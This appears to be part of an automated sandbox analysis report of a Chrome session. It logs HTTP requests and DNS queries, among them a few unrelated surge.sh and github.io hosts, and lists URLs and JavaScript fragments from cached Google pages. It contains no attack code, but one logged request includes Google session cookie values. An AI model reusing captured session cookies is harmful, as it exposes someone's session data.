            Source: global trafficHTTP traffic detected: GET /KTDOhPuoj2uFXQzWV1UoktTwtuucLM49NAFS07-vtX8dCGhSjpxJwumzTuzI6qZyyqLdmZASs3ARnaI3gIae1MYIjaG57KsmUhit2g=h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /6cr6PdE9s0J1ovFNm38uf-dwcOP--68QMWey603BCUah-QcO0gL0TvyqmTBYIgNnJfk8AEgISH_xpw_zd8FNao0jA14Q5MQ7p-eeIto=h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /kSVhJx6xNAhqot_OjnzSAp8kyKtL9nW65nqObijdjYcNfqDn4bLx-1g_1h4rz0maXRwJp6K4AEDCQi8dOg_tn_Y80R3NjNXbUN6Hag=h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /oLcLMz42MUjK9Iv4M4YSOfBIHcxUh9dck3PN8kT8FR_z9_mUlWzyf4JHqPavPsKHJ7FR2rlGZf51vgEv1k5i0QQai4_J0ffYkIFbaJA=h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /23ispX_lvsTfMdqVu6ra84IGV85IwhGPQyogx4AOuECIOQYVFewlJ0p4XkFbUoAJXDlc4LwopHv1SNEslf1B4XCDZg0P-85zw3DQ=h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /PVDn9Oj6dMbqqydywzGuLAPkbLwDX3Uuv1t6K8MORXFuQAVBLPNAy_yaQBc7bE-qmLHCmWThtcuwCFEwJPR_w6SDj_Um1q0FK7vC0w=h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /i7W2EWxINNLwgzMNOveR5SNQHKisftbymepppsfQEA1whmCJV0H0cauacdN-I0RfEc7Kz6PJsLAlw6zR97E1rpdxVRSGP_Y2UtFOGlQ=h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LteTgkerljFQFADjcuSo5-hiLDlUMnxk-QP08xyTBWi-SxZUSDbqeBS-hjK5Gbetam9PLtnpbdMbHBTpR7zBzKxrB6-c-ynRMH6yrcTKaZOVlnLvBc4=h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /aD5GNhlaU2d70gmSy5ioL1dMSUZN9cHDWPLkIBLhCsJ-BgcGUm-PD6o8XExZcx1i2iZV6PH0P8v3ceg0x7Tzd_OZ5FV0nXs5mX15sgA=h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /tvQvvubDZ2r6Ou8zxkVzkIvddC1snCCq4xD4dhafjAJhHLDsEvHDEUms9RyVH_g-nI_8yTyeahZshZqwMV0NdHxD-K9v-Zbm4DF2vds=h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /JtYUq9HfkkOryxudgp34oqI8qFu9a6mmL64OXjcDX7mfEwcX_pxmTdurvxssofY4swTY2c_M1Kk5o1a863CGTiBZkxxuYXfjiNgz=h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /mjVS_Izc6fGAvuaT0v--gb2so5mZvAbI5EUMUB41cWB7tpy81trBCR8rIlj8NoKgPzDWGN-Hs97NlW0T9W57YJ5z9A8QQWwXUYa_Zg=h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dMQ1Q4xlLrl3-KsZvX_9v56emij4OkRxzapLM7RSuZVd7PgqfjPxKR4KY8hVHYXqP2ZkS-_ZueXb9ywW66H2oCyTglApr1ELCy3woOAviTgFP6uyAd0=h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: chromecache_487.12.drString found in binary or memory: href="https://www.youtube.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link" equals www.youtube.com (Youtube)
            Source: chromecache_487.12.drString found in binary or memory: href="https://www.facebook.com/Google" equals www.facebook.com (Facebook)
            Source: chromecache_487.12.drString found in binary or memory: href="https://www.linkedin.com/company/google" equals www.linkedin.com (Linkedin)
            Source: chromecache_487.12.drString found in binary or memory: href="https://www.youtube.com/user/Google" equals www.youtube.com (Youtube)
            Source: chromecache_487.12.drString found in binary or memory: data-g-cta_url="https://www.youtube.com/musicpremium"> equals www.youtube.com (Youtube)
            Source: chromecache_487.12.drString found in binary or memory: data-g-cta_url="https://www.youtube.com/yt/about/"> equals www.youtube.com (Youtube)
            Source: chromecache_487.12.drString found in binary or memory: href="https://www.youtube.com/musicpremium" equals www.youtube.com (Youtube)
            Source: chromecache_487.12.drString found in binary or memory: href="https://www.youtube.com/yt/about/" equals www.youtube.com (Youtube)
            Source: chromecache_487.12.drString found in binary or memory: data-g-cta_url="https://www.youtube.com/playlist?list=PLioTR_jPKuQ5etOIcRO9334FnOF4JsMZC" equals www.youtube.com (Youtube)
            Source: chromecache_487.12.drString found in binary or memory: href="https://www.youtube.com/playlist?list=PLioTR_jPKuQ5etOIcRO9334FnOF4JsMZC" equals www.youtube.com (Youtube)
            Source: chromecache_1192.12.drString found in binary or memory: L.getElementsByTagName("iframe"),la=S.length,na=0;na<la;na++)if(!u&&c(S[na],H.Ge)){hJ("https://www.youtube.com/iframe_api");u=!0;break}})}}else F(v.vtp_gtmOnSuccess)}var q=["www.youtube.com","www.youtube-nocookie.com"],r={UNSTARTED:-1,ENDED:0,PLAYING:1,PAUSED:2,BUFFERING:3,CUED:5},t,u=!1;Z.__ytl=n;Z.__ytl.o="ytl";Z.__ytl.isVendorTemplate=!0;Z.__ytl.priorityOverride=0;Z.__ytl.isInfrastructure=!1; equals www.youtube.com (Youtube)
            Source: chromecache_493.12.dr, chromecache_849.12.dr, chromecache_1192.12.drString found in binary or memory: Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},Yj:function(){e=zb()},nd:function(){d()}}};var gc=ja(["data-gtm-yt-inspected-"]),FC=["www.youtube.com","www.youtube-nocookie.com"],GC,HC=!1; equals www.youtube.com (Youtube)
            Source: chromecache_1139.12.drString found in binary or memory: function X(a,b){this.v={};this.playerInfo={};this.videoTitle="";this.j=this.g=null;this.h=0;this.m=!1;this.l=[];this.i=null;this.A={};this.options=null;if(!a)throw Error("YouTube player element ID required.");this.id=ra(this);b=Object.assign({title:"video player",videoId:"",width:640,height:360},b||{});var c=document;if(a=typeof a==="string"?c.getElementById(a):a){W.yt_embedsEnableRsaforFromIframeApi&&vb();c=a.tagName.toLowerCase()==="iframe";b.host||(b.host=c?ob(a.src):"https://www.youtube.com");this.options= equals www.youtube.com (Youtube)
            Source: chromecache_1139.12.drString found in binary or memory: function vb(){var a=new tb,b=["https://www.youtube.com"];b=b===void 0?sb:b;pa(function(c){switch(c.g){case 1:return C(c,ub(),2);case 2:if(!c.m){c.g=3;break}return C(c,Promise.all(b.map(function(d){var g;return pa(function(k){if(k.g==1)return k.l=2,C(k,navigator.permissions.query({name:"top-level-storage-access",requestedOrigin:d}),4);k.g!=2?(g=k.m,g.state==="prompt"&&a.g.push(d),k.g=0,k.l=0):(k.l=0,k.i=null,k.g=0)})})),4); equals www.youtube.com (Youtube)
            Source: chromecache_919.12.dr, chromecache_745.12.drString found in binary or memory: return b}DC.H="internal.enableAutoEventOnTimer";var gc=ja(["data-gtm-yt-inspected-"]),FC=["www.youtube.com","www.youtube-nocookie.com"],GC,HC=!1; equals www.youtube.com (Youtube)
            Source: chromecache_741.12.drString found in binary or memory: var Ci=".story-carousel__text-inner",Di="story-carousel__text-inner--active",Fi=".glue-pagination-page-list",Bi="StoriesCarouselCtrl.model.currentPage",Ei="gluepaginationtotalpages",Ki="(min-width: 1024px)",Gi="(min-width: 0) and (max-width: 599px)",Hi="(min-width: 600px) and (max-width: 1023px)",Ji=15,Li=35;var Mi=angular.module("glueYtVideoService",[A.module.name]),Ni=Ka("https://www.youtube.com/iframe_api");function V(a,b){this.EventType={lc:"glue.ng.ytVideo.service.IframeApiInitalized"};this.i=a;this.j=b;this.Events={Sb:"glue.ng.ytVideo.service.IframeApiInitalized"};this.scriptLoaded=this.apiInitialized=!1;this.f={};this.apiInitialized||Oi(this)}function Oi(a){a.j.onYouTubeIframeAPIReady=angular.bind(a,function(){this.apiInitialized=!0;this.i.$broadcast(this.EventType.lc,this)})} equals www.youtube.com (Youtube)
            Source: chromecache_493.12.drString found in binary or memory: var SB=function(a,b,c,d,e){var f=Jz("fsl",c?"nv.mwt":"mwt",0),g;g=c?Jz("fsl","nv.ids",[]):Jz("fsl","ids",[]);if(!g.length)return!0;var k=Oz(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);N(121);if(m==="https://www.facebook.com/tr/")return N(122),!0;k["gtm.elementUrl"]=m;k["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(k["gtm.interactedFormName"]=a.getAttribute("name"));e&&(k["gtm.formSubmitElement"]=e,k["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!wy(k,yy(b, equals www.facebook.com (Facebook)
            Source: chromecache_677.12.drString found in binary or memory: var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/b0557ce3\/www-widgetapi.vflset\/www-widgetapi.js';try{var ttPolicy=window.trustedTypes.createPolicy("youtube-widget-api",{createScriptURL:function(x){return x}});scriptUrl=ttPolicy.createScriptURL(scriptUrl)}catch(e){}var YT;if(!window["YT"])YT={loading:0,loaded:0};var YTConfig;if(!window["YTConfig"])YTConfig={"host":"https://www.youtube.com"}; equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: equable-toothpaste.surge.sh
            Source: global trafficDNS traffic detected: DNS query: sharedfiles2.github.io
            Source: global trafficDNS traffic detected: DNS query: pbs.twimg.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: tasty-library.surge.sh
            Source: global trafficDNS traffic detected: DNS query: artzoya.com
            Source: global trafficDNS traffic detected: DNS query: google.com
            Source: global trafficDNS traffic detected: DNS query: ogs.google.com
            Source: global trafficDNS traffic detected: DNS query: apis.google.com
            Source: global trafficDNS traffic detected: DNS query: play.google.com
            Source: global trafficDNS traffic detected: DNS query: recovertogether.withgoogle.com
            Source: global trafficDNS traffic detected: DNS query: lh3.googleusercontent.com
            Source: global trafficDNS traffic detected: DNS query: www.youtube.com
            Source: global trafficDNS traffic detected: DNS query: sustainability.google
            Source: global trafficDNS traffic detected: DNS query: www.blog.google
            Source: global trafficDNS traffic detected: DNS query: blog.google
            Source: global trafficDNS traffic detected: DNS query: googletagmanager.com
            Source: global trafficDNS traffic detected: DNS query: csp.withgoogle.com
            Source: global trafficDNS traffic detected: DNS query: mail.google.com
            Source: global trafficDNS traffic detected: DNS query: smallbusiness.withgoogle.com
            Source: global trafficDNS traffic detected: DNS query: survey.g.doubleclick.net
            Source: global trafficDNS traffic detected: DNS query: about.google
            Source: unknownHTTP traffic detected: POST /gen_204?s=webhp&t=cap&atyp=csi&ei=CsT2Zo-iIaySxc8Pn72EmA8&rt=wsrt.1050,cbs.108,cbt.961,hst.49&opi=89978449&ts=199973 HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"Content-Type: text/plain;charset=UTF-8sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.google.comX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 9115Server: GitHub.comContent-Type: text/html; charset=utf-8permissions-policy: interest-cohort=()ETag: "66f42b03-239b"Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'X-GitHub-Request-Id: F6F5:1E472F:CAADD4:DCC49C:66F6C3F5Accept-Ranges: bytesAge: 0Date: Fri, 27 Sep 2024 14:40:53 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740038-EWRX-Cache: MISSX-Cache-Hits: 0X-Timer: S1727448053.484068,VS0,VE16Vary: Accept-EncodingX-Fastly-Request-ID: 00e16721d9332e96212759a007ba433bbf6e0107
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1565Date: Fri, 27 Sep 2024 14:41:09 GMTAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cacheX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Cloud-Trace-Context: 687cc8ea3c893752bef8e52ce6fdf324Date: Fri, 27 Sep 2024 14:43:02 GMTServer: Google FrontendContent-Length: 0Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
            Source: chromecache_471.12.dr, chromecache_894.12.dr, chromecache_725.12.dr, chromecache_1207.12.drString found in binary or memory: http://angularjs.org
            Source: chromecache_1162.12.drString found in binary or memory: http://scrollmagic.io
            Source: chromecache_1161.12.dr, chromecache_1021.12.drString found in binary or memory: http://www.broofa.com
            Source: chromecache_487.12.drString found in binary or memory: https://abc.xyz/investor/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
            Source: chromecache_987.12.drString found in binary or memory: https://about.google/
            Source: chromecache_487.12.drString found in binary or memory: https://about.google/intl/ALL_us/products/
            Source: chromecache_987.12.drString found in binary or memory: https://about.google/products/
            Source: chromecache_987.12.drString found in binary or memory: https://accounts.google.com/AccountChooser/signinchooser?service=mail&amp;continue=https%3A%2F%2Fmai
            Source: chromecache_987.12.drString found in binary or memory: https://accounts.google.com/signup/v2/createaccount?service=mail&amp;continue=https://mail.google.co
            Source: chromecache_987.12.drString found in binary or memory: https://accounts.google.com/signup/v2/webcreateaccount?service=mail&amp;continue=https%3A%2F%2Fmail.
            Source: chromecache_487.12.drString found in binary or memory: https://admanager.google.com/home/
            Source: chromecache_487.12.drString found in binary or memory: https://ads.google.com/home/?subid=ww-ww-et-g-aw-a-about_products_1-redlmo2
            Source: chromecache_487.12.drString found in binary or memory: https://ads.google.com/home/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
            Source: chromecache_745.12.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
            Source: chromecache_767.12.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
            Source: chromecache_1161.12.dr, chromecache_1021.12.drString found in binary or memory: https://apis.google.com
            Source: chromecache_1009.12.drString found in binary or memory: https://apis.google.com/js/api.js
            Source: chromecache_987.12.drString found in binary or memory: https://apps.apple.com/us/app/gmail-email-by-google/id422689480
            Source: chromecache_487.12.drString found in binary or memory: https://artsandculture.google.com/?utm_medium=referral&amp;utm_source=about.google
            Source: chromecache_487.12.drString found in binary or memory: https://assistant.google.com/
            Source: chromecache_487.12.drString found in binary or memory: https://assistant.google.com/business/
            Source: chromecache_487.12.drString found in binary or memory: https://biz.waze.com/
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/inside-google/infrastructure/
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/inside-google/infrastructure/our-work-to-build-a-more-sustainable-future-in-nebr
            Source: chromecache_487.12.drString found in binary or memory: https://blog.google/outreach-initiatives/grow-with-google/interview-warmup/
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/outreach-initiatives/public-policy/
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/outreach-initiatives/public-policy/google-deloitte-digital-sprinters-sustainabil
            Source: chromecache_891.12.drString found in binary or memory: https://blog.google/outreach-initiatives/sustainability/
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/outreach-initiatives/sustainability/2024-environmental-report/
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/outreach-initiatives/sustainability/google-ai-project-greenlight/
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/outreach-initiatives/sustainability/google-ai-research-extreme-heat-resilience/
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/outreach-initiatives/sustainability/google-ai-wildfire-detection/
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/outreach-initiatives/sustainability/google-clean-energy-asia-pacific/
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/outreach-initiatives/sustainability/google-holocene-direct-air-capture/
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/outreach-initiatives/sustainability/google-pixel-nest-fitbit-plastic-free-packag
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/outreach-initiatives/sustainability/google-wildfire-boundary-maps-europe-africa/
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/outreach-initiatives/sustainability/helping-monarch-butterflies-2024/
            Source: chromecache_585.12.dr, chromecache_891.12.drString found in binary or memory: https://blog.google/outreach-initiatives/sustainability/new-ways-were-advancing-our-clean-energy-com
            Source: chromecache_487.12.drString found in binary or memory: https://built-in.google/cars/
            Source: chromecache_487.12.drString found in binary or memory: https://businessmessages.google
            Source: chromecache_487.12.drString found in binary or memory: https://careers.google.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
            Source: chromecache_493.12.dr, chromecache_919.12.dr, chromecache_849.12.dr, chromecache_1192.12.dr, chromecache_745.12.drString found in binary or memory: https://cct.google/taggy/agent.js
            Source: chromecache_1068.12.dr, chromecache_1216.12.drString found in binary or memory: https://cda-push-dev.sandbox.googleapis.com/upload/
            Source: chromecache_487.12.drString found in binary or memory: https://chrome.google.com/webstore/detail/google-drawings/mkaakpdehdafacodkgkpghoibnmamcme?hl=en-US
            Source: chromecache_487.12.drString found in binary or memory: https://chromeenterprise.google
            Source: chromecache_487.12.drString found in binary or memory: https://chromeenterprise.google/
            Source: chromecache_487.12.drString found in binary or memory: https://cloud.google.com/
            Source: chromecache_487.12.drString found in binary or memory: https://cloud.google.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
            Source: chromecache_1216.12.drString found in binary or memory: https://content-push.googleapis.com/upload/
            Source: chromecache_487.12.drString found in binary or memory: https://crisisresponse.google/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
            Source: chromecache_487.12.drString found in binary or memory: https://crisisresponse.google/?utm_source=about.google&amp;utm_medium=referral&amp;utm_campaign=site
            Source: chromecache_947.12.dr, chromecache_716.12.drString found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
            Source: chromecache_487.12.drString found in binary or memory: https://developers.google.com/business-communications/business-messages/guides
            Source: chromecache_889.12.dr, chromecache_569.12.dr, chromecache_1226.12.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/error-messages#
            Source: chromecache_487.12.drString found in binary or memory: https://developers.google.com/products/?hl=en
            Source: chromecache_1139.12.drString found in binary or memory: https://developers.google.com/youtube/iframe_api_reference#Events
            Source: chromecache_487.12.drString found in binary or memory: https://diversity.google/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
            Source: chromecache_487.12.drString found in binary or memory: https://edu.google.com/workspace-for-education/classroom/
            Source: chromecache_487.12.drString found in binary or memory: https://edu.google.com?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
            Source: chromecache_1068.12.dr, chromecache_1216.12.drString found in binary or memory: https://embeddedassistant-webchannel.googleapis.com/google.assistant.embedded.v1.EmbeddedAssistant/A
            Source: chromecache_487.12.drString found in binary or memory: https://enterprise.google.com/android/
            Source: chromecache_487.12.drString found in binary or memory: https://enterprise.google.com/maps/products/mapsapi.html
            Source: chromecache_487.12.drString found in binary or memory: https://enterprise.google.com/search/
            Source: chromecache_487.12.drString found in binary or memory: https://families.google/familylink/
            Source: chromecache_487.12.drString found in binary or memory: https://fi.google.com/about/
            Source: chromecache_487.12.drString found in binary or memory: https://files.google.com/
